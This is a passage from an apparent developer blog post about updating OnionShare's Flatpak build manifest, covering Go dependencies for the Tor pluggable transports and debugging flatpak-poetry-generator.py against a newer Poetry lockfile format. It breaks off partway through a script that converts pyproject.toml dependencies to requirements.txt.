- . /usr/lib/sdk/golang/enable.sh; export GOPATH=$PWD; export GO111MODULE=off; go
install git.torproject.org/pluggable-transports/meek.git/meek.git
build-options:
env:
GOBIN: /app/bin/
buildsystem: simple
name: meek-client
sources:
- dest: src/git/torproject/org/pluggable-transports/goptlib/git
tag: v1.1.0
type: git
url: https://git.torproject.org/pluggable-transports/goptlib.git.git
- dest: src/github/com/andybalholm/brotli
tag: v1.0.4
type: git
url: https://github.com/andybalholm/brotli.git
- dest: src/github/com/klauspost/compress
tag: v1.15.9
type: git
url: https://github.com/klauspost/compress.git
- dest: src/github/com/refraction-networking/utls
tag: v1.1.5
type: git
url: https://github.com/refraction-networking/utls.git
- dest: src/golang/org/x/crypto
tag: v0.0.0-20220829220503-c86fa9a7ed90
type: git
url: https://golang.org/x/crypto.git
- dest: src/golang/org/x/net
tag: v0.0.0-20220909164309-bea034e7d591
type: git
url: https://golang.org/x/net.git
- dest: src/golang/org/x/sys
tag: v0.0.0-20220728004956-3c1f35247d10
type: git
url: https://golang.org/x/sys.git
- dest: src/golang/org/x/term
tag: v0.0.0-20210927222741-03fcf44c2211
type: git
url: https://golang.org/x/term.git
- dest: src/golang/org/x/text
tag: v0.3.7
type: git
url: https://golang.org/x/text.git
- dest: src/golang/org/x/tools
tag: v0.0.0-20180917221912-90fa682c2a6e
type: git
url: https://golang.org/x/tools.git
</code></pre>
<p>I then copy and paste the YAML into my OnionShare Flatpak manifest--though I'm reordering it slightly so <code>name</code> is at the top. This is what it looks like:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">meek-client</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">. /usr/lib/sdk/golang/enable.sh; export GOPATH=$PWD; export GO111MODULE=off; go</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">install git.torproject.org/pluggable-transports/meek.git/meek.git</span>
<span class="w"> </span><span class="nt">build-options</span><span class="p">:</span>
<span class="w"> </span><span class="nt">env</span><span class="p">:</span>
<span class="w"> </span><span class="nt">GOBIN</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/app/bin/</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/git/torproject/org/pluggable-transports/goptlib/git</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v1.1.0</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://git.torproject.org/pluggable-transports/goptlib.git.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/github/com/andybalholm/brotli</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v1.0.4</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://github.com/andybalholm/brotli.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/github/com/klauspost/compress</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v1.15.9</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://github.com/klauspost/compress.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/github/com/refraction-networking/utls</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v1.1.5</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://github.com/refraction-networking/utls.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/crypto</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.0.0-20220829220503-c86fa9a7ed90</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/crypto.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/net</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.0.0-20220909164309-bea034e7d591</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/net.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/sys</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.0.0-20220728004956-3c1f35247d10</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/sys.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/term</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.0.0-20210927222741-03fcf44c2211</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/term.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/text</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.3.7</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/text.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/tools</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.0.0-20180917221912-90fa682c2a6e</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/tools.git</span>
</pre></div>
<p>Next, I'm doing the same with <code>snowflake-client</code>, and also <code>obfs4proxy</code> again for good measure:</p>
<div class="hll"><pre><span></span>./flatpak-go-deps.py<span class="w"> </span>git.torproject.org/pluggable-transports/snowflake.git/client@v2.6.0
./flatpak-go-deps.py<span class="w"> </span>gitlab.com/yawning/obfs4.git/obfs4proxy@obfs4proxy-0.0.14
</pre></div>
<p>The one change I needed to do was add the command <code>mv /app/bin/client /app/bin/snowflake-client</code> to the end of <code>build-commands</code> in <code>snowflake-client</code>, since by default the binary it creates is just called <code>client</code>.</p>
<p>This <em>looks</em> like it should work, but I still need to test it to confirm that it actually works. <strong>(Spoiler: It doesn't.)</strong> But before I can test it by building the Flatpak package, I'm going to finish updating the rest of the Flatpak manifest files, specifically updating the Python dependencies.</p>
<h3 id="trying-to-update-python-dependencies">Trying to update Python dependencies</h3><p>Here's my documentation from <code>RELEASE.md</code> for how to go about updating all of the Python dependencies, for both <code>onionshare-cli</code> and <code>onionshare</code>, in the Flatpak manifest file:</p>
<blockquote><pre><code>pip3 install toml requirements-parser
# clone flatpak-build-tools
git clone https://github.com/flatpak/flatpak-builder-tools.git
# get onionshare-cli dependencies
cd poetry
./flatpak-poetry-generator.py ../../onionshare/cli/poetry.lock
cd ..
# get onionshare dependencies
cd pip
./flatpak-pip-generator $(python3 -c 'import toml; print("\n".join(toml.loads(open("../../onionshare/desktop/pyproject.toml").read())["tool"]["poetry"]["dependencies"]))' |grep -vi onionshare_cli |grep -vi python | grep -vi pyside6 | grep -vi cx_freeze |tr "\n" " ")
cd ..
# convert to yaml
./flatpak-json2yaml.py -o onionshare-cli.yml poetry/generated-poetry-sources.json
./flatpak-json2yaml.py -o onionshare.yml pip/python3-modules.json
</code></pre>
</blockquote>
<p>Hopefully this will just work with minimal fuss.</p>
<p>I'm going to start with the <code>onionsharea-cli</code> dependencies:</p>
<pre><code>$ ./flatpak-poetry-generator.py ../../onionshare/cli/poetry.lock
Scanning "../../onionshare/cli/poetry.lock"
Traceback (most recent call last):
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 166, in <module>
main()
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 139, in main
dep_names = get_dep_names(parsed_lockfile, include_devel=include_devel)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 112, in get_dep_names
package["category"] == "dev"
~~~~~~~^^^^^^^^^^^^
KeyError: 'category'
</code></pre>
<p>Minimal fuss, it turns out, was too much to hope for. <em>🎵 Debugging noises... 🎵</em></p>
<h3 id="another-flatpak-builder-tools-rabbit-hole">Another flatpak-builder-tools rabbit hole</h3><p>I popped open <code>flatpak-poetry-generator.py</code> to see what the problem is. The exception happened in this function:</p>
<div class="hll"><pre><span></span><span class="k">def</span> <span class="nf">get_dep_names</span><span class="p">(</span><span class="n">parsed_lockfile</span><span class="p">:</span> <span class="nb">dict</span><span class="p">,</span> <span class="n">include_devel</span><span class="p">:</span> <span class="nb">bool</span> <span class="o">=</span> <span class="kc">True</span><span class="p">)</span> <span class="o">-></span> <span class="nb">list</span><span class="p">:</span>
<span class="w"> </span><span class="sd">"""Gets the list of dependency names.</span>
<span class="sd"> Args:</span>
<span class="sd"> parsed_lockfile (dict): The dictionary of the parsed lockfile.</span>
<span class="sd"> include_devel (bool): Include dev dependencies, defaults to True.</span>
<span class="sd"> Returns (list): The dependency names.</span>
<span class="sd"> """</span>
<span class="n">dep_names</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">section</span><span class="p">,</span> <span class="n">packages</span> <span class="ow">in</span> <span class="n">parsed_lockfile</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">if</span> <span class="n">section</span> <span class="o">==</span> <span class="s2">"package"</span><span class="p">:</span>
<span class="k">for</span> <span class="n">package</span> <span class="ow">in</span> <span class="n">packages</span><span class="p">:</span>
<span class="k">if</span> <span class="p">(</span>
<span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"dev"</span>
<span class="ow">and</span> <span class="n">include_devel</span>
<span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">]</span>
<span class="ow">or</span> <span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"main"</span>
<span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">]</span>
<span class="p">):</span>
<span class="n">dep_names</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">package</span><span class="p">[</span><span class="s2">"name"</span><span class="p">])</span>
<span class="k">return</span> <span class="n">dep_names</span>
</pre></div>
<p>For debugging purposes, I added the following line to the beginning of the for loop that's looping through packages (before the if statement):</p>
<div class="hll"><pre><span></span><span class="nb">print</span><span class="p">(</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">package</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">2</span><span class="p">))</span>
</pre></div>
<p>And I re-ran the script. This is the package that it choked on:</p>
<div class="hll"><pre><span></span><span class="p">{</span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"bidict"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0.22.1"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">"The bidirectional mapping library for Python."</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"optional"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"python-versions"</span><span class="p">:</span><span class="w"> </span><span class="s2">">=3.7"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"files"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"file"</span><span class="p">:</span><span class="w"> </span><span class="s2">"bidict-0.22.1-py3-none-any.whl"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"hash"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:6ef212238eb884b664f28da76f33f1d28b260f665fc737b413b287d5487d1e7b"</span>
<span class="w"> </span><span class="p">},</span>
<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"file"</span><span class="p">:</span><span class="w"> </span><span class="s2">"bidict-0.22.1.tar.gz"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"hash"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:1e0f7f74e4860e6d0943a05d4134c63a2fad86f3d4732fb265bd79e4e856d81d"</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"extras"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"docs"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"furo"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"sphinx"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"sphinx-copybutton"</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"lint"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"pre-commit"</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"test"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"hypothesis"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"pytest"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"pytest-benchmark[histogram]"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"pytest-cov"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"pytest-xdist"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"sortedcollections"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"sortedcontainers"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"sphinx"</span>
<span class="w"> </span><span class="p">]</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</pre></div>
<p>This package doesn't have a <code>category</code> key. Looking at the if statement, it seems that this basically says append the package to the list of dependencies if it's the <code>dev</code> category, <code>include_devel</code> is true, and the package isn't optional, or if it's in the <code>main</code> category and it's not optional. For this package, <code>category</code> doesn't seem to be set, so I'll modify the if statement like this:</p>
<div class="hll"><pre><span></span><span class="k">if</span> <span class="p">(</span>
<span class="p">(</span><span class="s2">"category"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">package</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">])</span>
<span class="ow">or</span> <span class="p">(</span>
<span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"dev"</span>
<span class="ow">and</span> <span class="n">include_devel</span>
<span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">]</span>
<span class="p">)</span>
<span class="ow">or</span> <span class="p">(</span><span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"main"</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">])</span>
<span class="p">):</span>
</pre></div>
<p>Now if <code>category</code> isn't set, it adds it to the list anyway. I also added some extra parenthesis to make the logic more clear. Let's see if this did this trick...</p>
<pre><code>$ ./flatpak-poetry-generator.py ../../onionshare/cli/poetry.lock
Scanning "../../onionshare/cli/poetry.lock"
Traceback (most recent call last):
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 168, in <module>
main()
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 157, in main
sources = get_module_sources(parsed_lockfile, include_devel=include_devel)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 67, in get_module_sources
package["category"] == "dev"
~~~~~~~^^^^^^^^^^^^
KeyError: 'category'
</code></pre>
<p>It's a similar error but it's on a different line of code, from this function:</p>
<div class="hll"><pre><span></span><span class="k">def</span> <span class="nf">get_module_sources</span><span class="p">(</span><span class="n">parsed_lockfile</span><span class="p">:</span> <span class="nb">dict</span><span class="p">,</span> <span class="n">include_devel</span><span class="p">:</span> <span class="nb">bool</span> <span class="o">=</span> <span class="kc">True</span><span class="p">)</span> <span class="o">-></span> <span class="nb">list</span><span class="p">:</span>
<span class="w"> </span><span class="sd">"""Gets the list of sources from a toml parsed lockfile.</span>
<span class="sd"> Args:</span>
<span class="sd"> parsed_lockfile (dict): The dictionary of the parsed lockfile.</span>
<span class="sd"> include_devel (bool): Include dev dependencies, defaults to True.</span>
<span class="sd"> Returns (list): The sources.</span>
<span class="sd"> """</span>
<span class="n">sources</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">hash_re</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s2">"(sha1|sha224|sha384|sha256|sha512|md5):([a-f0-9]+)"</span><span class="p">)</span>
<span class="k">for</span> <span class="n">section</span><span class="p">,</span> <span class="n">packages</span> <span class="ow">in</span> <span class="n">parsed_lockfile</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">if</span> <span class="n">section</span> <span class="o">==</span> <span class="s2">"package"</span><span class="p">:</span>
<span class="k">for</span> <span class="n">package</span> <span class="ow">in</span> <span class="n">packages</span><span class="p">:</span>
<span class="k">if</span> <span class="p">(</span>
<span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"dev"</span>
<span class="ow">and</span> <span class="n">include_devel</span>
<span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">]</span>
<span class="ow">or</span> <span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"main"</span>
<span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">]</span>
<span class="p">):</span>
<span class="c1"># Check for old metadata format (poetry version < 1.0.0b2)</span>
<span class="k">if</span> <span class="s2">"hashes"</span> <span class="ow">in</span> <span class="n">parsed_lockfile</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">]:</span>
<span class="n">hashes</span> <span class="o">=</span> <span class="n">parsed_lockfile</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="s2">"hashes"</span><span class="p">][</span><span class="n">package</span><span class="p">[</span><span class="s2">"name"</span><span class="p">]]</span>
<span class="c1"># Else new metadata format</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">hashes</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">package_name</span> <span class="ow">in</span> <span class="n">parsed_lockfile</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="s2">"files"</span><span class="p">]:</span>
<span class="k">if</span> <span class="n">package_name</span> <span class="o">==</span> <span class="n">package</span><span class="p">[</span><span class="s2">"name"</span><span class="p">]:</span>
<span class="o">--</span><span class="n">snip</span><span class="o">--</span>
</pre></div>
<p>I made the same change there and ran it again:</p>
<pre><code>$ ./flatpak-poetry-generator.py ../../onionshare/cli/poetry.lock
Scanning "../../onionshare/cli/poetry.lock"
Traceback (most recent call last):
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 170, in <module>
main()
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 159, in main
sources = get_module_sources(parsed_lockfile, include_devel=include_devel)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 81, in get_module_sources
for package_name in parsed_lockfile["metadata"]["files"]:
~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^
KeyError: 'files'
</code></pre>
<p>Okay... this time it's crashing because <code>parsed_lockfile["metadata"]</code> doesn't have a <code>files</code> key. You can see this line of code in the code block above. Notice the comments:</p>
<ul>
<li><code># Check for old metadata format (poetry version < 1.0.0b2)</code></li>
<li><code># Else new metadata format</code></li>
</ul>
<p>This makes me think that it's possible there's even yet <em>another</em> new Poetry metadata format that my current <code>poetry.lock</code> file is using, but that <code>flatpak-poetry-generator.py</code> doesn't know about yet, and this is why it's crashing. When I open <code>cli/poetry.lock</code>, it includes a comment at the top saying:</p>
<pre><code># This file is automatically @generated by Poetry 1.5.1 and should not be changed by hand.
</code></pre>
<p><em>"This is too much work,"</em> I thought to myself.</p>
<p>So I decided to shift gears. I opened <a href="https://github.com/flatpak/flatpak-builder-tools/issues/371">a bug report</a> in the flatpak-builder-tools repo about this bug I've encountered. I'm going to stop trying to use <code>flatpak-poetry-generator.py</code> and instead just use the <a href="https://github.com/flatpak/flatpak-builder-tools/tree/master/pip">Flatpak PIP Generator</a> for this.</p>
<h3 id="adding-poetry-to-requirements-txt-script">Adding Poetry to <code>requirements.txt</code> script</h3><p>The Flatpak PIP Generator let's you pass in a Python <code>requirements.txt</code> file as input and it generates a Flatpak manifest for those Python dependencies, in JSON format. Instead of trying to deal with <code>poetry.lock</code> files, I decided to write a script that converts the <code>pyproject.toml</code> files (where all of my Poetry dependencies are defined) into <code>requirements.txt</code> files. Here's the <code>flatpak/poetry-to-requirements.py</code> I just wrote:</p>
<div class="hll"><pre><span></span><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">import</span> <span class="nn">toml</span>
<span class="kn">import</span> <span class="nn">click</span>
<span class="k">def</span> <span class="nf">format_version</span><span class="p">(</span><span class="n">dep</span><span class="p">,</span> <span class="n">version</span><span class="p">):</span>
<span class="k">if</span> <span class="n">version</span> <span class="o">==</span> <span class="s2">"*"</span><span class="p">:</span>
<span class="k">return</span> <span class="n">dep</span>
<span class="c1"># If it's a dictionary, assume it's in the format {extras = ["socks"], version = "*"}</span>
<span class="k">elif</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">version</span><span class="p">,</span> <span class="nb">dict</span><span class="p">)</span> <span class="ow">and</span> <span class="s2">"version"</span> <span class="ow">in</span> <span class="n">version</span><span class="p">:</span>
<span class="n">version</span> <span class="o">=</span> <span class="n">version</span><span class="p">[</span><span class="s2">"version"</span><span class="p">]</span>
<span class="k">if</span> <span class="n">version</span> <span class="o">==</span> <span class="s2">"*"</span><span class="p">:</span>
<span class="k">return</span> <span class="n">dep</span>
<span class="k">elif</span> <span class="n">version</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s2">"^"</span><span class="p">):</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}</span><span class="s2">>=</span><span class="si">{</span><span class="n">version</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span><span class="si">}</span><span class="s2">.0"</span>
<span class="k">elif</span> <span class="n">version</span><span class="o">.</span><span class="n">startswith</span><span class="p">((</span><span class="s2">">="</span><span class="p">,</span> <span class="s2">"<="</span><span class="p">,</span> <span class="s2">"!="</span><span class="p">,</span> <span class="s2">"=="</span><span class="p">,</span> <span class="s2">"<"</span><span class="p">,</span> <span class="s2">">"</span><span class="p">)):</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}{</span><span class="n">version</span><span class="si">}</span><span class="s2">"</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}</span><span class="s2">==</span><span class="si">{</span><span class="n">version</span><span class="si">}</span><span class="s2">"</span>
<span class="k">elif</span> <span class="n">version</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s2">"^"</span><span class="p">):</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}</span><span class="s2">>=</span><span class="si">{</span><span class="n">version</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span><span class="si">}</span><span class="s2">.0"</span>
<span class="k">elif</span> <span class="n">version</span><span class="o">.</span><span class="n">startswith</span><span class="p">((</span><span class="s2">">="</span><span class="p">,</span> <span class="s2">"<="</span><span class="p">,</span> <span class="s2">"!="</span><span class="p">,</span> <span class="s2">"=="</span><span class="p">,</span> <span class="s2">"<"</span><span class="p">,</span> <span class="s2">">"</span><span class="p">)):</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}{</span><span class="n">version</span><span class="si">}</span><span class="s2">"</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}</span><span class="s2">==</span><span class="si">{</span><span class="n">version</span><span class="si">}</span><span class="s2">"</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">command</span><span class="p">()</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"pyproject_filename"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">poetry_to_requirements</span><span class="p">(</span><span class="n">pyproject_filename</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Convert poetry dependencies in a pyproject.toml to requirements format."""</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">pyproject_filename</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">toml</span><span class="o">.</span><span class="n">load</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="n">dependencies</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"tool"</span><span class="p">,</span> <span class="p">{})</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"poetry"</span><span class="p">,</span> <span class="p">{})</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"dependencies"</span><span class="p">,</span> <span class="p">{})</span>
